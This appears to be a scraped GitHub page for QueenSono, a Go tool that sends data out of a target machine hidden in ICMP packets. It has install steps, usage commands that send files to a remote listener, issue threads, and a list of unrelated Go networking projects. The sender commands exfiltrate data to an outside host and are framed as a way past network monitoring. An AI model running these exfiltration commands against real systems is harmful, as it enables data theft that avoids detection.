Golang binary for data exfiltration with ICMP protocol

Overview

QueenSono ICMP Data Exfiltration

A Golang Package for Data Exfiltration with ICMP protocol.

QueenSono tool only relies on the fact that ICMP protocol isn't monitored. It is quite common. It could also been used within a system with basic ICMP inspection (ie. frequency and content length watcher). Try to imitate PyExfil (and others) with the idea that the target machine does not necessary have python installed (so provide a binary could be useful)

Install it · Use it · Notes · Request Feature

Install

> Install the binary from source

Clone the repo and download the dependencies locally:

git clone https://github.com/ariary/QueenSono.git
make before.build

To build the ICMP packet sender qssender :

 build.queensono-sender

To build the ICMP packet receiver qsreceiver :

 build.queensono-receiver

Usage

qssender is the binary which will send ICMP packet to the listener , so it is the binary you have to transfer on your target machine.

qsreceiver is the listener on your local machine (or wherever you could receive icmp packet)

All commands and flags of the binaries could be found using --help

Example 1: Send with "ACK"

> In this example we want to send a big file and look after echo reply to ackowledge the reception of the packets (ACK).

demo

On local machine:

$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt
Explanation
  • -l 0.0.0.0listen on all interfaces for ICMP packet
  • -f received_bible.txt save received data in a file
  • -p show a progress bar of received data
  • On target machine:

    $ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
    $ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt
    
    Explanation
  • send file for sending file (bible.txt is the file in question)
  • -d 2 send a packet each 2 seconds
  • -l 127.0.0.1 the listening address for echo reply
  • -r 10.0.0.92 the address of my remote machine with qsreceiver listening
  • -s 50000 the data size I want to send in each packet
  • Example 2: Send without "ACK"

    > In this example we want to send a message without waiting for echo reply (it could be useful in case the target firewall filters incoming icmp packet)

    demo

    On local machine:

    $ qsreceiver receive truncated 1 -l 0.0.0.0
    
    Explanation
  • receive truncated 1 does not wait indefinitely if we don't received all the packets. (1 is the delay used with qssender)
  • On target machine:

    $ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N
    
    Explanation
  • -N noreply option (don't wait for echo reply)
  • Notes

    • only work on Linux (due to the use of golang net icmp package)
    • need cap_net_raw capabilities
    Issues
    • Write ip4 127.0.0.1 -> x.x.x.x (Ip Receiver) sendto: invalid argument

      Write ip4 127.0.0.1 -> x.x.x.x (Ip Receiver) sendto: invalid argument

      Im trying this Go in my Test environment and this problem occur. maybe in need to test some other OS.

      I try with CentOS 8 and CentOS 7.. and have the same issue/problem. Write ip4 127.0.0.1 -> x.x.x.x (Ip Receiver) sendto: invalid argument

      This problem happen in the "sender" machine. occur after running the command """"qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt""""" KR Jose

      bug 
      opened by zamzibar-bofh 6
    • Cannot execute qssender on Mac

      Cannot execute qssender on Mac

      I have started the listening host on my kali(VM with bridge connection. Can ping). I am trying to send a doc of small size from my mac to my kali using the qssender but can't. Required permissions are given. How should I execute this qssender file. I am using the qssender file that I created in my kali along with qsreceiver.

      Screenshot 2021-10-21 at 4 24 52 PM
      opened by KRiteshchowdary 2
    • Manipulate echo reply

      Manipulate echo reply

      From now using net package does not allow to modify echo reply (echo reply msg = original msg)

      if we were able to do so, we could change the exchange direction (first the client send a request to the server and content will be added in the echo reply msg)

      enhancement 
      opened by ariary 0
    • Optimize packet size

      Optimize packet size

      It seems that the getPacket does not take into account ICMP packet header: cf https://github.com/ariary/QueenSono/blob/59dd5da577325ac5f45f0012112886b893c4d88c/pkg/icmp/receive.go#L138

      Try replace it by 65535, to get the whole size of th ip packet

      (https://stackoverflow.com/questions/9449837/maximum-legal-size-of-icmp-echo-packet)

      bug enhancement 
      opened by ariary 2
    Releases(v1.1.2)
    Owner
    Ariary
    Security Engineer naively hoping that his technical background will one day be more effective than social engineering
    Ariary
    🚥 Yet another pinger: A high-performance ICMP ping implementation build on top of BPF technology.

    yap Yet-Another-Pinger: A high-performance ICMP ping implementation build on top of BPF technology. yap uses the gopacket library to receive and handl

    dongdong 39 Jun 21, 2022
    Use ICMP requests to check the alive subnet.

    Doge-AliveCheck Use ICMP requests to check the alive subnet. Build go build -ldflags "-s -w" -trimpath Usage Doge-AliveCheck.exe

    TimWhite 18 Dec 15, 2021
    Ethr is a Comprehensive Network Measurement Tool for TCP, UDP & ICMP.

    Ethr Ethr is a cross platform network performance measurement tool written in golang. The goal of this project is to provide a native tool for compreh

    Microsoft 5.5k Aug 5, 2022
    [FORK] ICMP Ping library for Go

    forked from go-ping/ping go get -u github.com/gandaldf/ping go-ping A simple but powerful ICMP echo (ping) library for Go, inspired by go-fastping. He

    Diego Parisi 0 Oct 21, 2021
    Simple dashboard to check if hosts are up (via ICMP)

    About ping-dashboard is a simple dashboard to quickly check if a large amount of hosts are up (via ICMP). Building $ cd /path/to/build/directory $ GOB

    Kory Prince 0 Jan 14, 2022
    C-ping is a very simple and small ping tool that sends ICMP Echo datagram to a host.

    C-ping is a very simple and small ping tool that sends ICMP Echo datagram to a host.

    Chen Chen 4 Aug 9, 2022
    wire protocol for multiplexing connections or streams into a single connection, based on a subset of the SSH Connection Protocol

    qmux qmux is a wire protocol for multiplexing connections or streams into a single connection. It is based on the SSH Connection Protocol, which is th

    Jeff Lindsay 189 Jun 24, 2022
    A simple tool to convert socket5 proxy protocol to http proxy protocol

    Socket5 to HTTP 这是一个超简单的 Socket5 代理转换成 HTTP 代理的小工具。 如何安装? Golang 用户 # Required Go 1.17+ go install github.com/mritd/[email protected] Docker 用户 docker pull m

    mritd 8 Aug 4, 2022
    Protocol Buffers - Google's data interchange format

    Protocol Buffers - Google's data interchange format Copyright 2008 Google Inc. https://developers.google.com/protocol-buffers/ Overview Protocol Buffe

    Protocol Buffers 55.6k Aug 4, 2022
    Go support for Protocol Buffers - Google's data interchange format

    Go support for Protocol Buffers - Google's data interchange format Google's data interchange format. Copyright 2010 The Go Authors. https://github.com

    Tinker Board - Android 0 Dec 15, 2021
    Implementing SPEEDEX price computation engine in Golang as a standalone binary that exchanges can call

    speedex-standalone Implementing SPEEDEX price computation engine in Golang as a standalone binary that exchanges can call. Notes from Geoff About Tato

    Samuel Wong 1 Dec 1, 2021
    A tool to analyze and troubleshoot a Go binary size.

    goweight A tool to analyze and troubleshoot a Go binary size. For more, see this blog post ✅ Get a breakdown of all modules inside a binary ✅ Supports

    Dotan J. Nahum 1.5k Aug 7, 2022
    Instant, disposable, single-binary web based live chat server. Go + VueJS.

    Niltalk Niltalk is a web based disposable chat server. It allows users to create password protected disposable, ephemeral chatrooms and invite peers t

    Kailash Nadh 854 Jul 5, 2022
    provides alternative to simlinking with a configurable proxy binary

    Shim Shim is a standalone binary used for shimming executables instead of relying on symlinks. Shim is based on the chocolatey shim https://docs.choco

    Patrick Huber 0 Oct 21, 2021
    This app brings the Matterbridge binary to your server to connect Nextcloud Talk with other chat services

    This app brings the Matterbridge binary to your server to connect Nextcloud Talk with other chat services

    Nextcloud 26 Jul 25, 2022
    Easy to use arbitrarily-ordered encoding/binary.ByteOrder

    byteorder byteorder is a Go module for working with arbitrarily-ordered byte slices. It is useful e.g. when dealing with Modbus wire formats. Installa

    andig 0 Dec 5, 2021
    Simple HTTP/HTTPS proxy - designed to be distributed as a self-contained binary that can be dropped in anywhere and run.

    Simple Proxy This is a simple HTTP/HTTPS proxy - designed to be distributed as a self-contained binary that can be dropped in anywhere and run. Code b

    Jamie Thompson 13 May 9, 2022
    Gmqtt is a flexible, high-performance MQTT broker library that fully implements the MQTT protocol V3.1.1 and V5 in golang

    中文文档 Gmqtt News: MQTT V5 is now supported. But due to those new features in v5, there area lots of breaking changes. If you have any migration problem

    null 709 Aug 5, 2022
    Implementation of the FTPS protocol for Golang.

    FTPS Implementation for Go Information This implementation does not implement the full FTP/FTPS specification. Only a small subset. I have not done a

    Marco Beierer 27 Mar 14, 2022